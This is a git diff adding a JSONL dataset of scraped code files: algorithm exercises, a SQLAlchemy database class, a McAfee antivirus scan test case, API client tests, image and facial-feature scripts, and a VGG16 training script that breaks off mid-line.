diff --git "a/4714.jsonl" "b/4714.jsonl"
new file mode 100644--- /dev/null
+++ "b/4714.jsonl"
@@ -0,0 +1,677 @@
+{"seq_id":"14230913","text":"# 자연수 N에 몇 번의 연산을 통해 다른 자연수 M을 만든다.\n# +1, -1, *2, -10 -> 4가지 연산이 있을 때,\n# 최소 몇번의 연산을 거쳐야 M을 만들 수 있는가?\n\n# N =2, M=7\n# (2+1)*2+1= 7 최소 3번의 연산 필요하다.\n\n# 2 7 -> 3번\n# 3 15 -> 4번\n# 36 1007 -> 8번\n\nfrom collections import deque\n\ndef operation():\n global result\n while Q:\n front, check = Q.popleft()\n if front == M:\n result = check\n return\n for i in range(4):\n if i == 0:\n if 1<= front + 1 <= 1000000 and visited[front+1] == False:\n Q.append((front+1, check+1))\n visited[front+1] = True\n elif i == 1:\n if 1<= front-1 <= 1000000 and visited[front-1] == False:\n Q.append((front-1, check+1))\n visited[front-1] = True\n elif i == 2:\n if 1 <= front * 2 <= 1000000 and visited[front*2] == False:\n Q.append((front*2, check+1))\n visited[front*2] = True\n elif i == 3:\n if i<= front-10 <=1000000 and visited[front-10] ==False:\n Q.append((front-10, check+1))\n visited[front-10] = True\n\nT = int(input())\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n result = 0\n visited = [False] * 1000001\n Q = deque()\n Q.append((N, 0))\n operation()\n\n print(\"#{} {}\".format(tc, result))","sub_path":"SWEA/advanced/그래프기본과 탐색/연산.py","file_name":"연산.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636699037","text":"def get_checksum(spreadsheet):\n \"\"\"\n :param spreadsheet: list: of lists of numbers\n :return: sum of the differences between max & min in each row\n \"\"\"\n cumulative_checksum = 0\n for row in spreadsheet:\n diff = max(row) - min(row)\n cumulative_checksum += diff\n return cumulative_checksum\n\n\nif __name__ == '__main__':\n raw_spreadsheet = open('raw_spreadsheet.txt').readlines()\n spreadsheet = []\n for row in raw_spreadsheet:\n spreadsheet.append([int(v) for v in row.split('\t')])\n print('checksum: ' + str(get_checksum(spreadsheet)))\n","sub_path":"advent2017/day02/corruption_checksum.py","file_name":"corruption_checksum.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"47639769","text":"#! /usr/bin/python3\n\ndef count_twos(limit):\n \"\"\"\n Accept a number and count the number of appearances of \"2\" digits.\n \"\"\"\n\n count = 0\n\n for integer in range(limit + 1):\n count += str(integer).count('2')\n\n print('%i (is the number of appearances of \"2\" between 0 and %i)' \n % (count, limit))\n\n\nif __name__ == \"__main__\":\n import sys, timeit\n \n # Sanity check CLI command.\n if len(sys.argv) >= 2:\n print(timeit.timeit(\"count_twos(int(sys.argv[1]))\", setup=\"from __main__ import count_twos\", number=10))\n #count_twos(int(sys.argv[1]))\n else:\n print('Please enter a number.')\n","sub_path":"sendbloom/count_twos_v2.py","file_name":"count_twos_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"239782669","text":"from sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nfrom Station import Station\n\nclass Database(object):\n\n def __init__(self):\n self.dbLocation = 'mysql+pymysql://root@localhost/MPD_MANAGEMENT'\n self.session = self.createSession()\n\n def createSession(self):\n engine = create_engine(self.dbLocation)\n Session = sessionmaker(bind=engine)\n session = Session()\n return session\n\n def storeStation(self, station):\n self.session.add(station)\n self.session.commit()\n\n def removeStation(self, station):\n (self.session.query(Station).filter_by(name=station.getName())).delete()\n self.session.commit()\n\n def getActiveStations(self):\n stations = self.session.query(Station).all()\n return stations\n\n def getStation(self, name):\n station = (self.session.query(Station).filter_by(name=name)).first()\n if station is not None:\n print('retrieving' + station.getName())\n return station\n raise NameError\n\n def checkStored(self, name):\n print('checking ' + name)\n if (self.session.query(Station).filter_by(name=name)).count():\n return True\n else:\n return False\n\n def getFreeSlot(self): # Poor time complexity, fix\n stations = self.session.query(Station).all()\n takenPorts = []\n for station in stations:\n takenPorts.append(int(station.httpPort) - 8000)\n\n for i in range(0, 100):\n if i not in takenPorts:\n return i\n\n \n def updateState(self, obj):\n self.session.merge(obj)\n self.session.commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"34088460","text":"from components.ui.help_window import Ui_HelpWindow\nfrom components.window import SubWindow\n\n\nclass HelpDoc(SubWindow):\n\n def __init__(self, name='HelpDoc', parent=None):\n super().__init__(name, parent, Ui_HelpWindow())\n with open(\"Readme.md\", \"r\", encoding=\"utf-8\") as input_file:\n text = input_file.read()\n self.ui.textBrowser.setMarkdown(text)\n","sub_path":"components/help_doc.py","file_name":"help_doc.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"116188783","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: lsh-678\n# TestcaseDescription: Scanning a program/joke on read,write and execute with read,write and execute pe\n\nimport sys\nimport logging\nimport shutil\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nsys.path.append('..')\nimport commonAntiMalwareFns\nimport commonOASFns\nimport commonFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : lsh-678\")\n logging.info(\"Description : Scanning a program/joke on read,write and execute with read,write and execute pe\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n self._joke_file_source = self.getConfig('PAYLOAD_PATH') + '/jokes/COMJOKE.COM'\n self._joke_file_target = os.path.dirname(os.path.abspath(sys.argv[0])) + '/lsh-678'\n self._original_dat =\"/opt/NAI/LinuxShield/engine/dat\"\n self._original_old_dat =\"/opt/NAI/LinuxShield/engine/dat_old\"\n self._eit_dat=self.getConfig('PAYLOAD_PATH') + '/jokes/dat'\n if self._cleanup() != 0 :\n return 1 \n if not os.path.exists(self._joke_file_source) :\n logging.error(\"Payload directory does not exist.\")\n return 1\n if not os.path.exists(self._joke_file_target) :\n os.mkdir(self._joke_file_target)\n if not commonOASFns.disableOAS() :\n logging.error(\"Failed to disable OAS for payload copy\")\n return 1\n try :\n logging.debug(\"Copying the payload\")\n shutil.move(self._original_dat,self._original_old_dat)\n shutil.copytree(self._eit_dat,self._original_dat)\n except :\n logging.error(\"Failed to copy the payload\")\n return 1\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n logging.debug(\"Copying the payload\")\n shutil.copy(self._joke_file_source, self._joke_file_target)\n except :\n logging.error(\"Failed to copy as expected\")\n return 1\n if not commonOASFns.setOASPrimaryAction(\"Rename\"):\n logging.error(\"failed to set primary action\")\n return 1\n if not commonOASFns.setOASSecondaryAction(\"Delete\"):\n logging.error(\"failed to set secondry action\")\n return 1\n if not commonOASFns.enableOAS() :\n logging.error(\"Failed to enable OAS after payload copy\")\n return 1\n self._jokefile_path= self._joke_file_target+\"/\"+\"COMJOKE.COM\"\n _p =subprocess.call([\"file\",self._jokefile_path])\n if _p!=0:\n logging.info(\"file comand failed as expected\")\n return 0\n return 0 \n \n def verify(self):\n if os.path.exists(self._jokefile_path):\n loggging.error(\"file has to be delete\")\n return 1\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n \n def _cleanup(self):\n _retval = 0\n logging.debug(\"Resetting to defaults\")\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n logging.debug(\"Removing the macro target directory\")\n #if os.path.exists(self._joke_file_target) :\n #shutil.rmtree(self._joke_file_target)\n if os.path.exists(self._original_old_dat) :\n shutil.rmtree(self._original_dat)\t\t\n shutil.move(self._original_old_dat,self._original_dat)\n return _retval\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_Scan_Actions_4.py","file_name":"OAS_Scan_Actions_4.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"528496236","text":"\n# 参考: https://qiita.com/takayg1/items/c811bd07c21923d7ec69\n# 単位元 と 結合法則 (交換則は成り立たなくてOK) が必要! それらがあれば O(N)→O(log N) にできる.)\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(logN)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, l, r):\n \"\"\"\n [l, r)のsegfuncしたものを得る\n l: index(0-index)\n r: index(0-index)\n \"\"\"\n res = self.ide_ele\n\n l += self.num\n r += self.num\n while l < r:\n if l & 1:\n res = self.segfunc(res, self.tree[l])\n l += 1\n if r & 1:\n res = self.segfunc(res, self.tree[r - 1])\n l >>= 1\n r >>= 1\n return res\n","sub_path":"library/SegTree.py","file_name":"SegTree.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"270077549","text":"# use dummy head.\n# store previous. \n# head of reverse\n# next \n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseBetween(self, head: ListNode, m: int, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n current = head\n prev = dummy\n nextt = dummy # record current's original next\n reverse_head = dummy # record prev to m'th \n reverse_last = dummy # record m'th\n counter = 1\n while current is not None:\n nextt = current.next\n if counter == m:\n reverse_head = prev\n reverse_last = current\n elif counter > m and counter < n:\n current.next = prev\n elif counter == n:\n # fix reverse head\n nextt = current.next\n current.next = prev \n reverse_head.next = current\n reverse_last.next = nextt\n break\n prev = current \n current = nextt\n counter += 1\n return dummy.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\nhead.next.next.next.next = ListNode(5)\nm = 2\nn = 4\nhead = Solution().reverseBetween(head, m, n)\nwhile head is not None:\n print(head.val)\n head = head.next","sub_path":"leetcode1-115/92. Reverse Linked List II.py","file_name":"92. Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"300682137","text":"import numpy as np\nimport cv2\nimport time\n\npath = \"img_test/space/\"\nname = \"space\" + str(4) + \".jpg\"\nimg_path = path + name\ndebug = True\n\nimg = cv2.imread(img_path)\nimg = cv2.resize(img, (700, 400))\ncopy = img\nshape = list(img.shape)\n\n\n#\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n# 105\nsensitivity = 90\nlower_white = np.array([0, 0, 255 - sensitivity])\nupper_white = np.array([255, sensitivity, 255])\nmask = cv2.inRange(hsv, lower_white, upper_white)\nimg = cv2.bitwise_and(img, img, mask=mask)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('test', img)\ncv2.waitKey()\ncv2.imwrite(path + 'result/' + name, img)\n","sub_path":"recognition/discover_space.py","file_name":"discover_space.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"399859597","text":"# Python script to calculate the distance measures (features) for all of the tracked face data\n# \nimport os\n\n# Supporting method to calculate distance between two points\ndef distance_between(n1, n2):\n\treturn (abs(n1[0] - n2[0])**2 + abs(n1[1] - n2[1])**2)**0.5\n\n# Supporting method to calculate midpoint of two points\ndef point_between(n1, n2):\n\tx = [n1[0], n2[0]]\n\ty = [n1[1], n2[1]]\n\treturn (abs(x[0] - x[1])/2 + min(x), abs(y[0] - y[1])/2 + min(y))\n\nemotions = {\n\t\"Angry\"\t\t: 1,\n\t\"Contempt\" \t: 2,\n\t\"Fear\" \t\t: 3,\n\t\"Happy\" \t: 4,\n\t\"Sadness\" \t: 5,\n\t\"Surprise\" \t: 6,\n\t\"Natural\" \t: 7 # Other\n}\n\ndata = {}\nfout = open(\"emotions.train\", \"w\")\nfor name in [\"Happy\", \"Sadness\", \"Surprise\", \"Angry\", \"Contempt\", \"Fear\", \"Natural\"]:\n\tdata[str(emotions[name])] = []\n\tfor sequence in os.listdir('Face data/' + name):\n\t\tdata[str(emotions[name])].append([])\n\t\tfor entry in open('Face data/' + name + \"/\" + sequence):\n\t\t\tx, y = [float(a) for a in entry.strip().replace(\" \", \" \").split(\" \")]\n\t\t\tdata[str(emotions[name])][-1].append((x, y))\n\nfor key in data:\n\tfor index in range(len(data[key])):\n\t\ti = 1\n\t\tvertex = [0.0] + data[key][index]\n\n\t\tfout.write(key)\n\n\t\tleft_eye = point_between(vertex[37], vertex[40])\n\t\tright_eye = point_between(vertex[43], vertex[46])\n\t\tbetween_eyes = distance_between(left_eye, right_eye)\n\t\tnose = point_between(vertex[31], vertex[34])\n\t\tfor x in range(1, 17 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(32, 36 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(37, 42 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(43, 48 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(49, 66 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(0, 5):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[18+x], vertex[27-x]) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[53], vertex[57]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[52], vertex[58]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[51], vertex[59]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[49], vertex[55]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[50], vertex[54]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[60], vertex[56]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[61], vertex[66]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[62], vertex[65]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[63], vertex[64]) / between_eyes))\n\t\tfout.write(\"\\n\")\n","sub_path":"Classifiers/database-specific multi-class/rafd/calculatefeatures.py","file_name":"calculatefeatures.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"578203656","text":"\"\"\"\nPython Runtime Validation\n\"\"\"\n\nimport logging\nimport os\nimport subprocess\n\nfrom aws_lambda_builders.exceptions import MisMatchRuntimeError\n\nLOG = logging.getLogger(__name__)\n\n\nclass PythonRuntimeValidator(object):\n SUPPORTED_RUNTIMES = {\n \"python2.7\",\n \"python3.6\",\n \"python3.7\"\n }\n\n def __init__(self, runtime):\n self.language = \"python\"\n self.runtime = runtime\n self._valid_runtime_path = None\n\n def has_runtime(self):\n \"\"\"\n Checks if the runtime is supported.\n :param string runtime: Runtime to check\n :return bool: True, if the runtime is supported.\n \"\"\"\n return self.runtime in self.SUPPORTED_RUNTIMES\n\n def validate(self, runtime_path):\n \"\"\"\n Checks if the language supplied matches the required lambda runtime\n :param string runtime_path: runtime to check eg: /usr/bin/python3.6\n :raises MisMatchRuntimeError: Version mismatch of the language vs the required runtime\n \"\"\"\n if not self.has_runtime():\n LOG.warning(\"'%s' runtime is not \"\n \"a supported runtime\", self.runtime)\n return\n\n cmd = self._validate_python_cmd(runtime_path)\n\n p = subprocess.Popen(cmd,\n cwd=os.getcwd(),\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n if p.returncode != 0:\n raise MisMatchRuntimeError(language=self.language,\n required_runtime=self.runtime,\n runtime_path=runtime_path)\n else:\n self._valid_runtime_path = runtime_path\n return self._valid_runtime_path\n\n def _validate_python_cmd(self, runtime_path):\n major, minor = self.runtime.replace(self.language, \"\").split('.')\n cmd = [\n runtime_path,\n \"-c\",\n \"import sys; \"\n \"assert sys.version_info.major == {major} \"\n \"and sys.version_info.minor == {minor}\".format(\n major=major,\n minor=minor)]\n return cmd\n\n @property\n def validated_runtime_path(self):\n return self._valid_runtime_path if self._valid_runtime_path is not None else None\n","sub_path":"aws_lambda_builders/workflows/python_pip/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"491697259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPURPOSE: For testing meetup models\nAUTHOR: dylangregersen\nDATE: Mon Sep 15 00:52:58 2014\n\"\"\"\n# ########################################################################### #\n\n# import modules \n\nfrom __future__ import print_function, division, unicode_literals\nimport time\nimport unittest\n\nfrom mock import MagicMock\nfrom mock import Mock\nfrom mock import patch\nimport requests\n\nfrom meetup.api import MeetupClient\n\n\nMEETUP_KEY = \"abc123\"\n\n\n# ########################################################################### #\n\n\nclass MeetupClientTests(unittest.TestCase):\n \"\"\"Tests that ensure GET requests function correctly.\n \"\"\"\n\n def setUp(self):\n self.client = MeetupClient(api_key=MEETUP_KEY)\n self.json_body = MagicMock()\n self.response_headers = {\n 'X-RateLimit-Remaining': \"14\",\n 'X-RateLimit-Reset': \"2\"\n }\n self.mock_json = Mock(return_value=self.json_body)\n self.mock_response = Mock(\n headers=self.response_headers,\n json=self.mock_json\n )\n\n @patch.object(requests, \"get\")\n def test_invoke_get_calls_requests(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"member_id\": \"12345\"\n },\n method=\"GET\"\n )\n mock_get.assert_called_once_with(\n \"https://api.meetup.com/2/groups\"\n \"?page=1000\"\n \"&key=abc123\"\n \"&member_id=12345\"\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"post\")\n def test_invoke_post_calls_requests(self, mock_post):\n mock_post.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"name\": \"Awesome Team\"\n },\n method=\"POST\"\n )\n mock_post.assert_called_once_with(\n \"https://api.meetup.com/2/groups\",\n data={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"name\": \"Awesome Team\"\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"delete\")\n def test_invoke_delete_calls_requests(self, mock_delete):\n mock_delete.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups/awesome-team\",\n params={\n \"id\": 72\n },\n method=\"DELETE\"\n )\n mock_delete.assert_called_once_with(\n \"https://api.meetup.com/2/groups/awesome-team\",\n params={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"id\": 72\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(time, \"sleep\")\n @patch.object(requests, \"get\")\n def test_hit_rate_limit_waits(self, mock_get, mock_sleep):\n mock_get.return_value = self.mock_response\n self.response_headers['X-RateLimit-Remaining'] = \"0\"\n self.response_headers['X-RateLimit-Reset'] = \"4\"\n self.client.invoke(\"2/groups/foo\")\n\n self.response_headers['X-RateLimit-Reset'] = \"2\"\n self.client.invoke(\"2/groups/bar\")\n self.assertEqual(2, len(mock_get.call_args_list))\n mock_sleep.assert_called_once_with(4)\n\n mock_sleep.reset_mock()\n self.client.invoke(\"2/groups/chew\")\n mock_sleep.assert_called_once_with(2)\n\n @patch.object(requests, \"get\")\n def test_get_next_page_uses_meta_to_fetch_next(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"next\": \"http://meetup.foo.co/page-2\"\n }\n }\n )\n mock_get.assert_called_once_with(\"http://meetup.foo.co/page-2\")\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n def test_get_next_page_no_next_is_none(self):\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"prev\": \"http://fifo.com/1\"\n }\n }\n )\n self.assertIsNone(result)\n\n def test_get_next_page_no_meta_is_none(self):\n result = self.client.get_next_page({})\n self.assertIsNone(result)\n\n\n\n# ########################################################################### #\nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"meetup/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"623230834","text":"#takes the ATL zoo and converts it into .dsltrans files\n\nfrom ZipDownloader import ZipDownloader\nfrom ZipHandler import ZipHandler\nfrom ConvertATL2XMI import ConvertATL2XMI\nfrom RTEHandler import RTEHandler\nfrom ConvertATL2DSLTrans import ConvertATL2DSLTrans\n\nclass ZooConverter:\n\n def __init__(self, zip_dir, trans_dir):\n self.zip_dir = zip_dir\n self.trans_dir = trans_dir\n\n def download_zips(self, zoo_site):\n ZipDownloader(zoo_site, self.zip_dir)\n\n def separate_transformations(self):\n zh = ZipHandler(self.zip_dir, self.trans_dir)\n zh.unzip()\n\n def run_atl_to_xmi(self):\n cax = ConvertATL2XMI(self.trans_dir)\n cax.set_up()\n cax.convert()\n cax.tear_down()\n\n def run_types_trans(self):\n rte = RTEHandler(self.trans_dir)\n rte.run()\n\n def run_atl_to_dsltrans(self):\n catd = ConvertATL2DSLTrans(self.trans_dir)\n catd.set_up()\n catd.convert()\n catd.tear_down()\n\nif __name__ == \"__main__\":\n\n zoo_site = \"https://www.eclipse.org/atl/atlTransformations/\"\n zip_dir = \"./zip_dir\"\n trans_dir = \"./example_dir\"\n zc = ZooConverter(zip_dir, trans_dir)\n\n zc.download_zips(zoo_site)\n\n zc.separate_transformations()\n\n zc.run_atl_to_xmi()\n\n zc.run_types_trans()\n\n zc.run_atl_to_dsltrans()","sub_path":"converter/zoo_to_dsltrans.py","file_name":"zoo_to_dsltrans.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402133995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 15 09:15:07 2020\n\n@author: Frank\n\"\"\"\n\n\n############################################################\n# DES: Define VGG16 CNN and train model.\n# Once trained, export model to working directory.\n############################################################\n\n############################################################\n# Libraries:\n############################################################\n\nimport os\n#import scripts.set_working_dir as set_wd\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import RMSprop\nimport math\nfrom itertools import product\n\n#########################################################\n# Set Working Directory:\n# - Ensure RELATIVE working directory (so it can be replicated by any user)\n# - Ensure users can read data using either Windows or UNIX folders\n# - Working directory should be '.\\scripts' for windows or './scripts' for UNIX\n#########################################################\n\n#working_dir = set_wd.set_correct_working_dir()\n\n############################################################\n# Define LeNet model:\n# - Parameters to change:\n# - - Optimisation\n# - - Loss function\n############################################################\n\n#########################################\n# Define combinations of paramters:\n#########################################\n\n# Loss functions\nloss_fns = ['binary_crossentropy', 'mean_squared_error', 'mean_squared_logarithmic_error', 'sparse_categorical_crossentropy']\n\n# Optimisation for SGD learning rate:\nopts = [0.1, 0.01, 0.001]\n\n# combinations:\ncombos = list(product(loss_fns, opts))\n\ni = combos[1]\n\n#########################################\n# Define X models (X = len(loss_fns)*len(opts)\n#########################################\n\nfor i in combos:\n\n VGG16_cnn_model = tf.keras.models.Sequential()\n VGG16_cnn_model.add(Conv2D(input_shape=(224,224,3),filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n \n \n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dense(units=4096,activation=\"relu\"))\n #model.add(Dense(units=2, activation=\"softmax\"))\n model.add(Dense(units=1, activation=\"softmax\"))\n \n #VGG16_cnn_model.compile(optimizer='adam',\n # loss='sparse_categorical_crossentropy',\n # metrics=['accuracy'])\n\n\n #model_summary = VGG16_cnn_model.summary()\n #print(model_summary)\n\n sgd = 